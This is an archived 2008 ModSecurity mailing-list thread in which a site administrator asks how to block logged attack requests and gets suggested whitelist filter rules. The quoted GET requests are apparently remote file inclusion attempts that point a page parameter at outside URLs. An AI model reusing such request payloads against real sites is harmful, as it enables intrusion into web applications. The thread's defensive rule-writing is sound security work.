Thread: [mod-security-users] How to block this type of attack
Brought to you by:
victorhora,
zimmerletw
From: Steve W. <ste...@gm...> - 2008-01-29 08:57:07
|
Hi, We are using mod_sec 1.9.5 w/ apache 1.3.x and I tried to right a simple = rule to block the following attack but for some reason my rule didn't=20 work. Can anyone assist? GET=20 members.php?title=3DGiles&amp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Ba= mp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bam= p%3Bamp%3Bamp%3Bamp%3Bamp%3Baction=3Dhttp%3A%2F%2Fwww.municipioxii.it%2Fs= unnyway%2Feheqebi%2Fjahibop%2F&amp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bam= p%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp= %3Bamp%3Bamp%3Bamp%3Bamp%3Bprintable=3Dyes&amp%3Bamp%3Bamp%3Bamp%3Bam= p%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp= %3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bprintable=3Dyes&amp%3Bamp%3Bamp%3Bam= p%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp= %3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bprintable=3Dyes&amp%3Bamp%3Bamp%3Bam= p%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp= %3Bamp%3Bamp%3Bamp%3Bamp%3Bprintable=3Dyes&amp%3Bamp%3Bamp%3Bamp%3Bam= p%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp= %3Bamp%3Bamp%3Bprintable=3Dyes&amp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bam= p%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bpri= ntable=3Dyes&amp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp GET index.php?title=3DHelp:Contents&amp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp= %3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%= 3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Baction=3Dhistory&amp%3Bamp%3Bamp%3Bam= p%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp= %3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bprintable=3Dhttp%3A%2F%2Fwww.fabcr= aft.co.uk%2Fforum%2Flovuqo%2Fzil%2F&amp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp= %3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%= 3Bamp%3Bamp%3Bamp%3Bprintable=3Dyes&amp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp= %3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%= 3Bamp%3Bamp%3Bprintable=3Dyes&amp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp= %3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%= 3Bprintable=3Dyes&amp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp= %3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bprintable=3Dyes&= amp;amp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp= %3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bprintable=3Dyes&amp%3Bamp%3Bamp%3Bam= p%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3B The rule I tied is as follows: SecFilterSelective REQUEST_URI=20 "\.php\?.*%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3B= amp"=20 "id:6600005,rev:1,severity:2,msg:'Generic URL Injection attack'" thx, SW |
From: Christian B. <ch...@jw...> - 2008-01-29 09:11:22
|
Hi, I do not have the 1.9 docs available right now, but for a quit shot, =20 you could simply try to white-filter that resource by using a rule =20 like this: SecFilterSelective ARGS:title !^[A-Za-z0-9:_-]{0,25}$ Which will allow the parameter title to only contain a word (including =20= numbers, ':', '-' and '-') of length 0 to at most 25. Of course you =20 need to adjust that to your applications needs. In order to filter only the members.php script, you could put this =20 into a LocationMatch-directive: <LocationMatch "^/members.php"> SecFilterSelective ARGS:title !^[A-Za-z0-9:_-]{0,25}$ </LocationMatch> Regards, Chris p.s: Note, all this has NOT been tested due to unavailability of =20 ModSec 1.9 and is primarily meant to give a hint. Am 29.01.2008 um 09:56 schrieb Steve West: > Hi, > > We are using mod_sec 1.9.5 w/ apache 1.3.x and I tried to right a =20 > simple > rule to block the following attack but for some reason my rule didn't > work. Can anyone assist? > > GET > members.php?title=3DGiles&amp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp=20= > %3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp=20 > %3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Baction=3Dhttp%3A%2F=20 > %2Fwww.municipioxii.it%2Fsunnyway%2Feheqebi%2Fjahibop%2F&amp=20 > %3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp=20 > %3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp=20 > %3Bprintable=3Dyes&amp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp=20= > %3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp=20 > %3Bamp%3Bamp%3Bamp%3Bprintable=3Dyes&amp%3Bamp%3Bamp%3Bamp%3Bamp=20= > %3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp=20 > %3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bprintable=3Dyes&amp%3Bamp%3Bamp=20= > %3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp=20 > %3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bprintable=3Dyes&amp%3Bamp=20= > %3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp=20 > %3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bprintable=3Dyes&amp%3Bamp=20= > %3Bamp%3Bam > p%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp=20 > %3Bamp%3Bamp%3Bamp%3Bprintable=3Dyes&amp%3Bamp%3Bamp%3Bamp%3Bamp=20= > %3Bamp%3Bamp%3Bamp > > GET = index.php?title=3DHelp:Contents&amp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bam= p%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%= 3Bamp%3Bamp%3Bamp%3Bamp%3Baction=3Dhistory&amp%3Bamp%3Bamp%3Bamp%3Bamp= %3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3= Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bprintable=3Dhttp%3A%2F%2Fwww.fabcraft.co.uk= %2Fforum%2Flovuqo%2Fzil%2F&amp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Ba= mp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp= %3Bamp%3Bprintable=3Dyes&amp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp= %3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3= Bprintable=3Dyes&amp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3= Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bprintable=3Dy= es&amp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Ba= mp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bprintable=3Dyes&amp%3Bamp%3Ba= mp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3=20 > Bamp > %3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp=20 > %3Bprintable=3Dyes&amp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp=20= > %3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3B > > > The rule I tied is as follows: > > SecFilterSelective REQUEST_URI > "\.php\?.*%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp=20 > %3Bamp%3Bamp" > "id:6600005,rev:1,severity:2,msg:'Generic URL Injection attack'" > > thx, > > SW > > > > > = ------------------------------------------------------------------------- > This SF.net email is sponsored by: Microsoft > Defy all challenges. Microsoft(R) Visual Studio 2008. > http://clk.atdmt.com/MRT/go/vse0120000070mrt/direct/01/ > _______________________________________________ > mod-security-users mailing list > mod...@li... > https://lists.sourceforge.net/lists/listinfo/mod-security-users |
From: Steve W. <ste...@gm...> - 2008-01-29 10:02:58
|
Hi Chris, Thanks for the suggestion and sample rule! Unfortunately, I couldn't get = it work using one of the following: (BTW 'ARGS:title' gave an error and I think 1.9 uses ARG_title) Tried this rule: SecFilterSelective REQUEST_URI "/amtwiki/index.php"=20 "chain,id:6600005,rev:1,severity:2,msg:'Generic URL too long attack'" SecFilterSelective ARG_title !^[A-Za-z0-9:_-]{0,25}$ Then tried just this: SecFilterSelective ARG_title !^[A-Za-z0-9:_-]{0,25}$ And then tried this rule: <LocationMatch "^/members.php"> SecFilterSelective ARG_title !^[A-Za-z0-9:_-]{0,25}$ </LocationMatch> SW Christian Bockermann wrote: > Hi, > > I do not have the 1.9 docs available right now, but for a quit shot,=20 > you could simply try to white-filter that resource by using a rule=20 > like this: > > SecFilterSelective ARGS:title !^[A-Za-z0-9:_-]{0,25}$ > > Which will allow the parameter title to only contain a word (including = > numbers, ':', '-' and '-') of length 0 to at most 25. Of course you=20 > need to adjust that to your applications needs. > > In order to filter only the members.php script, you could put this=20 > into a LocationMatch-directive: > > <LocationMatch "^/members.php"> > SecFilterSelective ARGS:title !^[A-Za-z0-9:_-]{0,25}$ > </LocationMatch> > > > Regards, > Chris > > > p.s: Note, all this has NOT been tested due to unavailability of=20 > ModSec 1.9 and is primarily meant to give a hint. > > > Am 29.01.2008 um 09:56 schrieb Steve West: > >> Hi, >> >> We are using mod_sec 1.9.5 w/ apache 1.3.x and I tried to right a simp= le >> rule to block the following attack but for some reason my rule didn't >> work. Can anyone assist? >> >> GET >> members.php?title=3DGiles&amp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%= 3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3= Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Baction=3Dhttp%3A%2F%2Fwww.municipioxii.it%= 2Fsunnyway%2Feheqebi%2Fjahibop%2F&amp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3= Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3B= amp%3Bamp%3Bamp%3Bamp%3Bamp%3Bprintable=3Dyes&amp%3Bamp%3Bamp%3Bamp%3= Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3B= amp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bprintable=3Dyes&amp%3Bamp%3Bamp%3= Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3B= amp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bprintable=3Dyes&amp%3Bamp%3Bamp%3= Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3B= amp%3Bamp%3Bamp%3Bamp%3Bamp%3Bprintable=3Dyes&amp%3Bamp%3Bamp%3Bamp%3= Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3B= amp%3Bamp%3Bamp%3Bprintable=3Dyes&amp%3Bamp%3Bamp%3Bam=20 >> >> p%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3B= amp%3Bamp%3Bamp%3Bprintable=3Dyes&amp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3= Bamp%3Bamp=20 >> >> >> GET=20 >> index.php?title=3DHelp:Contents&amp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%= 3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3= Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Baction=3Dhistory&amp%3Bamp%3Bamp%3Bamp= %3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%= 3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bprintable=3Dhttp%3A%2F%2Fwww.fabcra= ft.co.uk%2Fforum%2Flovuqo%2Fzil%2F&amp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%= 3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3= Bamp%3Bamp%3Bamp%3Bprintable=3Dyes&amp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%= 3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3= Bamp%3Bamp%3Bprintable=3Dyes&amp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%= 3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3= Bprintable=3Dyes&amp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%= 3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bprintable=3Dyes&a= mp;amp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp=20 >> >> %3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bprintable=3Dyes&= ;amp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3B= amp%3Bamp%3B=20 >> >> >> >> The rule I tied is as follows: >> >> SecFilterSelective REQUEST_URI >> "\.php\?.*%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp= %3Bamp"=20 >> >> "id:6600005,rev:1,severity:2,msg:'Generic URL Injection attack'" >> >> thx, >> >> SW >> >> >> >> >> ----------------------------------------------------------------------= ---=20 >> >> This SF.net email is sponsored by: Microsoft >> Defy all challenges. Microsoft(R) Visual Studio 2008. >> http://clk.atdmt.com/MRT/go/vse0120000070mrt/direct/01/ >> _______________________________________________ >> mod-security-users mailing list >> mod...@li... >> https://lists.sourceforge.net/lists/listinfo/mod-security-users > > |